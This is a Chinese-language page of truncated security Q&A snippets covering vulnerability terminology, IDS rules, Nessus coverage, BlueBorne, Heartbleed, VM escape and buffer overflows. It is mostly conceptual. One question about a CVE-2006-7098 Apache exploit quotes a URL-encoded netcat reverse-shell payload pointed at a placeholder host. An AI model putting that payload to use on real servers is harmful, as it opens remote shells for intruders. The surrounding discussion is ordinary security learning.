我很难找出攻击矢量/攻击面/漏洞和利用之间的区别。根据维基百科(漏洞)
若要攻击漏洞,攻击者必须至少有一个可用于连接到系统缺陷的工具或技术。在此框架中,漏洞</em
浏览 0提问于2015-06-04得票数 25
回答已采纳
1回答
模糊IDS规则
、、
是否存在混淆IDS规则的已知技术,因此攻击者不能轻易地使用它们来反向设计他们检测到的漏洞?
让我提供一些背景情况。有时,IDS供应商会意识到零日漏洞(一个尚未公开披露的漏洞)。在这种情况下,人们可以制定一项规则来检测利用该漏洞并将其推给每个人,试图防止利用该漏洞.但这带来了新的风险。特别是,攻击者可能能够分析IDS规则并使用该规则获取一些线索,从而使攻击者更容易识别漏洞并开始使用该漏洞攻击其他系统。
浏览 0提问于2014-08-21得票数 3
1回答
我要问的是,攻击是否被认为是利用特定漏洞,还是可以说多个漏洞利用了单个漏洞。例如,我们知道SQL通过SQL注入攻击有许多类型的攻击。我们是说SQL中通过发送意外命令来操作的漏洞本身就是漏洞,还是能够执行攻击操作的特定命令就是漏洞,这意味着它是1:1而不是1:*关系?
浏览 0提问于2015-05-04得票数 0
Nessus扫描了很多漏洞,所以我应该集中学习Nessus没有涵盖的漏洞,比如目录遍历攻击吗?我应该只研究Nessus没有覆盖的漏洞,或者学习所有的漏洞,无论Nessus是否覆盖。这两个问题是:
Nessus没有给出它可以找到的漏洞列表(它检查的所有漏洞,后来告诉我们它容易受到这些漏洞的攻击)。我们不知道Nessus的效率有多高(就像XSS攻击一样,OWASP上有大量的过滤器规避方法,我不知道Nessus涵盖了其中的
浏览 0提问于2016-04-30得票数 4
回答已采纳
1回答
Linux披露了基于Linux的BlueBorne攻击操作系统中的两个漏洞,这些漏洞允许攻击者完全控制受感染的设备。第一个漏洞是信息泄漏漏洞,它可以帮助攻击者确定目标设备使用的确切版本,并相应地调整他的漏洞。第二种是堆栈溢出,可以导致设备的完全控制。
例如,所有启用蓝牙的设备都应该被标记为恶意设备。此攻击不需要任何用户交互、身份验证或配对,使其几乎不可见。所有运行BlueZ的Linux设备都受到信息泄漏漏洞(CVE-
浏览 0提问于2017-09-13得票数 20
回答已采纳
背景链接:您可以找到在DAO上安装递归调用漏洞攻击涉及哪些帐户?中使用的帐户列表。您可以找到攻击发生在有任何方法可以确定DAO攻击者部署攻击所用的时间吗?中的时间段。
对DAO攻击的垃圾邮件反击是为了减缓攻击速度吗?
浏览 0提问于2016-06-23得票数 4
回答已采纳
我正在研究Apache的旧版本1.3.34的漏洞。我也不太明白在什么情况下CVE2006-7098漏洞可以被利用。nc%20myhost%2031337%20-e%20%2fbin%2f/sh%0d编译了cgipwn漏洞并将其安装在攻击者计算机apache的cgipwn中。从攻击者机器执行nc命令,指定-p作
浏览 0提问于2015-06-03得票数 0
回答已采纳
2回答
我一直在阅读Java反序列化漏洞,该漏洞会导致远程代码执行攻击。许多公开的功绩甚至可以用来进行攻击。
我没有找到任何描述攻击者如何利用该漏洞的教程。
浏览 0提问于2017-07-07得票数 1
3回答
今天,恶意软件的传播主要得益于浏览器及其插件中的漏洞。攻击者使用JavaScript攻击这些漏洞。这类攻击的两个例子是按驱动下载、缓冲区和堆栈溢出攻击。这两次攻击有什么区别?
浏览 0提问于2014-08-14得票数 0
回答已采纳
1回答
我正在利用这里中的一个漏洞。
利用漏洞可以很好地工作,但是我想找出导致漏洞的代码,它是RET覆盖基攻击,RET地址被覆盖到shell代码。我想知道易受攻击的函数epilog和prelog。
浏览 0提问于2018-02-11得票数 2
1回答
从希望针对某个软件应用程序或目标开发零天攻击的人的角度来看,攻击者必须执行以下两项任务:(1)在软件中发现新的可利用漏洞;(2)为该漏洞开发可靠的武器化攻击。例如,模糊分析、反向分析和静态分析可能有助于发现漏洞;但是,构建一个可靠的漏洞需要进行单独的分析和工作。
这两项任务中哪一项的平均成本更高?我想知道这两项任务的经济状况是什么,并了解成本的比例。我知道,如果您查看单个漏洞,代价将取决于漏洞,但我要问的是一般情况。例如,如果我们看一
浏览 0提问于2016-03-23得票数 6
2回答
为了研究SIP服务器的漏洞以及DOS攻击对QoS of VoIP服务的影响,我发现此漏洞可以被利用在SIP服务器上引发DoS。攻击者如何可能造成溢出?OpenSER上可能发生的溢出攻击和拒绝服务攻击之间的关系是什么?
我不了解攻击者的描述和执行的操作。
浏览 0提问于2012-06-22得票数 0
回答已采纳
我读过NVD(https://nvd.nist.gov/CVSS/v2-calculator)的访问复杂性,
此度量度量攻击者一旦访问目标系统就利用该漏洞所需的攻击的复杂性。媒体(M):在成功发动攻击之前,必须收集一些信息。低(L):攻击可以手动进行,几乎不需要技巧或额外的信息收集。我有一个问题:如果一个漏洞很难被发现,并且攻击者需要首先收集某些信息,但是该漏洞很容易被利用。如果本例中的访问复杂性度
浏览 0提问于2016-03-23得票数 0
3回答
SOA漏洞
、、
我必须写一篇关于SOA漏洞(SOA安全性)的硕士论文。从这个意义上说,找到web服务中的漏洞或找到现有漏洞的解决方案。在这个方向上,我一直在寻找SOA中的漏洞。一旦发现了漏洞,我就必须刺激它并向我的向导展示。我在OWASP中发现的一些相应的攻击是DOS攻击,注入攻击(SQL注入,XPath注入)。我现在不能做出正确的决定,下一步该怎么做。
浏览 0提问于2010-02-04得票数 1
回答已采纳
1回答
我正在编译漏洞和相关的攻击,我需要找到一个著名的攻击,利用一个使用后无漏洞。我找了一段时间了,虽然我似乎找不到任何东西。我知道很多时候在互联网浏览器和其他软件中都发现了自由后使用,虽然我只知道漏洞和更新页面,而不是具体的攻击。
浏览 0提问于2018-10-29得票数 0
1回答
查找堆栈缓冲区溢出
、、、、
我编写了一个易受攻击的程序,并利用它,在端口7777上运行了一个易受攻击的服务器,溢出并利用了这个漏洞。但我不明白的是如何在Windows (或其他操作系统)或软件中查找漏洞。我使用gcc和gdb进行调试,以找到编写该漏洞所需的所有内容。如何在其他程序/软件上发现堆栈缓冲区溢出漏洞,以及如何调试易受攻击的程序,或者如何使用gdb?
浏览 3提问于2015-04-24得票数 7
回答已采纳
我相信你们中的很多人都知道未加密无线鼠标的漏洞。如果不是,这里有一个报告漏洞的网站:https://www.mousejack.com/由于通信是未加密的,我认为攻击也是未加密的,所以我认为在公共空间“嗅探”这种攻击是非常容易的。然而,作为一个消费者,我没有能力写出我的代码并使用我现有的无线鼠
浏览 0提问于2016-04-07得票数 1
1回答
通过HeartBleed漏洞获取敏感信息的可能性是什么?
据我所见,这种攻击需要有人或什么东西将漏洞“发送”到服务器,所以如果没有人使用易受攻击的服务器,那么攻击者必须等待很长时间才能获得敏感信息?
浏览 0提问于2016-11-28得票数 0
回答已采纳
市场对这类问题非常保密,因为公司不会给攻击者提供滥用的漏洞,并且会泄露出被解决的漏洞,攻击者也会这么想,但也许某个地方泄露了一次未解决的攻击,我很有兴趣了解这一点。
浏览 0提问于2020-10-13得票数 1
回答已采纳
1回答
演示VM逃逸
、、、、
经过一些轻松的研究,我发现了一个漏洞CVE-2014-0983“甲骨文VirtualBox 3D加速多内存腐败漏洞”。Rapid7 7网站显示,针对metasploit的攻击可用于触发此漏洞。如果我希望攻击看起来很遥远,那么运行漏洞的最佳方式是什么?(我使用另一台PC充当远程攻击者)该漏洞据说是在运行VirtualBox 4.3.6的Windows7主机上进行测试的,但没有提到哪个操作系统正在虚拟盒上运行。
还有更多的方法来演示VM逃逸吗?
浏览 0提问于2016-10-25得票数 5
回答已采纳
扫码
添加站长 进交流群
领取专属 10元无门槛券
手把手带您无忧上云
相关资讯
热门标签
云服务器
ICP备案
云直播
对象存储
腾讯会议活动推荐
腾讯云开发者
